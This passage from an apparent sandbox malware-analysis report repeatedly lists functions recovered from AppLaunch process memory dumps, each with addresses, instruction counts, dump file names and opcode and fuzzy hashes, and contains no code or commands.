                                                                                                                                                                                              • Opcode ID: 8fae441efbad9eab783d0e2c8e598e63bb9fbbc6ab7c1d1e61b2cddeba9a0b87
                                                                                                                                                                                              • Instruction ID: e941e131207a1d24c108c8a33f09562a6e700e826961b600f9a82cdb5b29a720
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fae441efbad9eab783d0e2c8e598e63bb9fbbc6ab7c1d1e61b2cddeba9a0b87
                                                                                                                                                                                              • Instruction Fuzzy Hash: 481104357097518FCB169B19D85445ABFAAEFC5331358C08AE80ACB396DF75AC02C7A1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574B040 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6d2f073e49fe41338f898cfe39d6a6399658411b71cea4489b274fecf4941841
                                                                                                                                                                                              • Instruction ID: a83fd187f421633a07627cb80aefa03188e83ef85ed01f6e22f9ef6d0b4f78e3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d2f073e49fe41338f898cfe39d6a6399658411b71cea4489b274fecf4941841
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7911EF352006499BCB20DE6DDC8089F77E7AF84614B10CE29E4594B666DB71FD0A8B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 091625D1 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b6dbf9ae0151d305fb740142b376ae5d37b83278a2fc803fe602fccf95bf775e
                                                                                                                                                                                              • Instruction ID: 3dba47c902cb90a3af529147cf775a942b763945d8f2c8671714a5efad177d4c
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6dbf9ae0151d305fb740142b376ae5d37b83278a2fc803fe602fccf95bf775e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C811E5327012118FD714DF68D494AAA7BE6EFC9620F10456EE905CB3A2CF31AC01CB94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916B698 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2b98233f651bcd0607d31be0a122410e1e86edb12a00f20cd968116708c2f8d0
                                                                                                                                                                                              • Instruction ID: 4f9b28b933514d0538364dacc2b1f9634ac0ff224300623251509de3632c6422
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b98233f651bcd0607d31be0a122410e1e86edb12a00f20cd968116708c2f8d0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1134B5D043488FCB20CF9AC884BDEBFF8AB59328F14845AD455A7250D375A944CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0ED500 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 670c6af9314d51be64068fea22dabb25fb1d5263635bbf5cb831d36939f6186c
                                                                                                                                                                                              • Instruction ID: 6e552c325c29a94c0fdf1cb1ea72fcd7c15e76790328dc5271168d70f07dedf7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 670c6af9314d51be64068fea22dabb25fb1d5263635bbf5cb831d36939f6186c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A113D75A112099FCB00DFA9D88499EFFF5FF88310B10856ADA19E7305DB31A906CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916F230 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d713a2570d64aeeab350ca6fbb5fb99a4537fd0d35126332727547facdb04b94
                                                                                                                                                                                              • Instruction ID: b2b9573ed3890db9010f6161e10835886b5d4306215e241dab4e4f498b97c495
                                                                                                                                                                                              • Opcode Fuzzy Hash: d713a2570d64aeeab350ca6fbb5fb99a4537fd0d35126332727547facdb04b94
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8011D276910114AFCF069F95D908ED9BFB6FF4D310F0691AAE2046B272C732D864EB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09164640 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 982946b7b1a787cd380fcdda5d12b7e8ba1bd3d9ffd633c79afefea72659e923
                                                                                                                                                                                              • Instruction ID: c42b844500d7b03ba09333d12a13dcef65f9e6caa670c50843db0bee5633cd3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 982946b7b1a787cd380fcdda5d12b7e8ba1bd3d9ffd633c79afefea72659e923
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7111C074E002198FCB04DFA9D9589AEBBB6FB89301F208169D416B7350CB316D01CBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CE0F0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e1cbf0bf37233eecfa42f4e392c10d65857677989c736745ba87fd09aae06155
                                                                                                                                                                                              • Instruction ID: 2a0ead844bcf27215befc3ab358552f3f4ae528604240d62f867e377135a87c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: e1cbf0bf37233eecfa42f4e392c10d65857677989c736745ba87fd09aae06155
                                                                                                                                                                                              • Instruction Fuzzy Hash: DB11EF30600705CFCB15DF64D85056EBBB2FF88310714C96ADC0A9B756CB34AD66DB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574E1A4 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 22f7fed4ec55bec83599fb98513d2fb20d0d2edad6dadada1346e3fd6ffa084d
                                                                                                                                                                                              • Instruction ID: ba49faa7579f9725eac570529c2040c5d099b66e22c2133fada876a5021b70e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 22f7fed4ec55bec83599fb98513d2fb20d0d2edad6dadada1346e3fd6ffa084d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 431148750097898FC7118F79EC091963FF2FE9632134488CBC895CA563D7269509EB66
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05743DAD Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 327c14e5f99a09c2034aa0c46a9caba6b9ef21fb363e2d4f78895d462f70bfea
                                                                                                                                                                                              • Instruction ID: d52266511ff781865020adfa04e6b2976b51d174a6c22782fa8a63a3377c40bb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 327c14e5f99a09c2034aa0c46a9caba6b9ef21fb363e2d4f78895d462f70bfea
                                                                                                                                                                                              • Instruction Fuzzy Hash: F801B56190E3C49FCB02D77CAD7168A3FB59F02211F1944DBC4899B253E5354E48DB65
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916F3BF Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e5879ac89f16dbfc39401cb71090396d7b3f47fdc223e5e88f686dfdaa838a28
                                                                                                                                                                                              • Instruction ID: 1c1ebc4531a5672d79241b3e8e6b0695c37532fcb0497d4aa0871cd228615f80
                                                                                                                                                                                              • Opcode Fuzzy Hash: e5879ac89f16dbfc39401cb71090396d7b3f47fdc223e5e88f686dfdaa838a28
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F112531F042499FC704DFB5D8545BA7FF0AF49218B2445AEE896CB362E7359912CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C961E Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7296b4df7ff61dfbd3d5fdd38f8a5dc0cbe6c9a084a7bfa8469e066804d26af9
                                                                                                                                                                                              • Instruction ID: 5f91b387385eeaddc18d4fc0f5eb4def85a6006371a809c38de62e834c07e084
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7296b4df7ff61dfbd3d5fdd38f8a5dc0cbe6c9a084a7bfa8469e066804d26af9
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA119134A042898FDB14CBA8C944EDDBFF1AF4D314F188499D444BB3A2DB759D00CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E3090 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 33b79fe536eaa26662d30cc94769682fcc6b4121bdefa1e16d0799a22878ac81
                                                                                                                                                                                              • Instruction ID: 4719578efe723de9aaf6ce168ca46f3af75d5b22cfafbc90b50cc2ea00f3abe5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 33b79fe536eaa26662d30cc94769682fcc6b4121bdefa1e16d0799a22878ac81
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B11FE34D0030ACFCB54EFA8D8549AEBBF5EF84310F108569D569A7261EB78A951CB81
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 091625E0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 97e3870d4faf12415450531189bbfb5bad28574fe5e846dd09a6cd38f0202ad5
                                                                                                                                                                                              • Instruction ID: 7ef88ba4d94e17697b40f4fb1e8f95e78ef4ccf70cb3dacc9697cec31d92da87
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97e3870d4faf12415450531189bbfb5bad28574fe5e846dd09a6cd38f0202ad5
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE0180327012119FC714AF69D894A6A7BE6EBC9620B10456AEA06CB3A5CE71AC018B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09164457 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ab9e94b5f24b95ac8ce91f4dd3c12e9b293577cc0ae7198a63f7789458de8417
                                                                                                                                                                                              • Instruction ID: 35d909b5196b10b99b85379e87bbe6f0a02bafc6771457bdc4f2d72898df1e9b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab9e94b5f24b95ac8ce91f4dd3c12e9b293577cc0ae7198a63f7789458de8417
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF21D378E0121CCFDB24CF64D849BEDBBB0BB09319F10909AE849A72A0D7305A90CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C8B88 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f0c0161407ab166112a731e45b421008b4f9077d330e522fcb7685c4532f9939
                                                                                                                                                                                              • Instruction ID: 279cc0f87da15bbfdfec13f53c680c515417273107fde6fbcb87dfe3b2cd5594
                                                                                                                                                                                              • Opcode Fuzzy Hash: f0c0161407ab166112a731e45b421008b4f9077d330e522fcb7685c4532f9939
                                                                                                                                                                                              • Instruction Fuzzy Hash: C00182342003458BC734EF6DE88089FBBE6AF84350340CE2ED5454B617DB72B90887E4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574C4B0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 19028fb271154c974d672d019fdbcfabfd0c9d60157af1c3407c077ccc1b37a3
                                                                                                                                                                                              • Instruction ID: ed2cc0a1a2e91f65ca116f119534a442be467baa59803314f555fca5d162de2e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 19028fb271154c974d672d019fdbcfabfd0c9d60157af1c3407c077ccc1b37a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D0192353053449FC702EBB8E8154697F76BF8632571484A6E549CB263DB369C12CB51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916AF80 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7d78180661a6d0bcfed5aaf4f7056e70ab5f26feb26a08c11099915817790ea7
                                                                                                                                                                                              • Instruction ID: b4d8dc58cee308de361ea40d727257ef0a5e12d2b8f965e877fdee970d345821
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d78180661a6d0bcfed5aaf4f7056e70ab5f26feb26a08c11099915817790ea7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4701B1327082889FDB11DFB5D804C663BFDAF8670430884AEF409C7562E621E8248762
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E1B5D Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 69b8d4ec9bf42c6af3331e3ba5d79dd65dac1d1d93971d626d7c95bb1a6bce5d
                                                                                                                                                                                              • Instruction ID: 86877ab8aa177d2d39b57427c68928a2caa412cbfcd728a0d0dd6dde671d6e04
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69b8d4ec9bf42c6af3331e3ba5d79dd65dac1d1d93971d626d7c95bb1a6bce5d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0911C575A006189F8F61DFA9D84489EFBF5FF8C220B14456AE959E3310D731A914DB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0ECC80 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a99cf759ca2749fa791deebedf320ad4e4fdd7fb69d771d48f5341d8b6fcf000
                                                                                                                                                                                              • Instruction ID: acb88fa06980ad291188486ed20ee444966e80223dbf9da440c5c10f4e353f08
                                                                                                                                                                                              • Opcode Fuzzy Hash: a99cf759ca2749fa791deebedf320ad4e4fdd7fb69d771d48f5341d8b6fcf000
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6111D634A002188FDB18DBA8C5586DEBBF2EF8C315F208569E905B7351DB7A9C44CBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E1B60 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 767a63ad576b105741134757eab584c14f90866dbb80fda5e53cdd1c87256336
                                                                                                                                                                                              • Instruction ID: 362bba2e5f901a7f22f17cd32127af131b9e065b8be45f64eeea08b0aec235c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 767a63ad576b105741134757eab584c14f90866dbb80fda5e53cdd1c87256336
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211E575A006089F8F60DFA9D8408AEFBF5FF4C220B14456AE959E3320D731A9148F60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EA210 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 77e06d3186a0007bf89ef22d8c8bb46018a7a06ecbaaf6d7b868bd7449d50723
                                                                                                                                                                                              • Instruction ID: 04467110fc673580d06b06529597d5fd203283ed3b43ea5245ab0423e7319752
                                                                                                                                                                                              • Opcode Fuzzy Hash: 77e06d3186a0007bf89ef22d8c8bb46018a7a06ecbaaf6d7b868bd7449d50723
                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF081317013105B8720AEAFE48446EFAD6EBC8671350887FF50EDB746C9216C054795
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C42C8 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8552d23ae3f97767b305694a08406baa774fb992aae7e1ca56c86f9311a93a85
                                                                                                                                                                                              • Instruction ID: 8d1314a45dcaf8677073605b7aef28be7ce3c0c270f590965e4b5fc5925268ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8552d23ae3f97767b305694a08406baa774fb992aae7e1ca56c86f9311a93a85
                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F08132309241ABD3059B19E88489ABF6EFBCA3717548067E409C7251CB759C15C7A1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05749880 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 09bc84e13f47f67104c5f4e3d527d0d6e70f4b1fa37eabf2f990146930d183fe
                                                                                                                                                                                              • Instruction ID: 71e2209b8f07977363bfab8c6179f6753cac7199902cfd9b972ed98cbbec6970
                                                                                                                                                                                              • Opcode Fuzzy Hash: 09bc84e13f47f67104c5f4e3d527d0d6e70f4b1fa37eabf2f990146930d183fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 930171353021055B8A54BB3AE55856E3EF3EFC03613888D2EE6068B644DE717D0A4797
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C2528 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
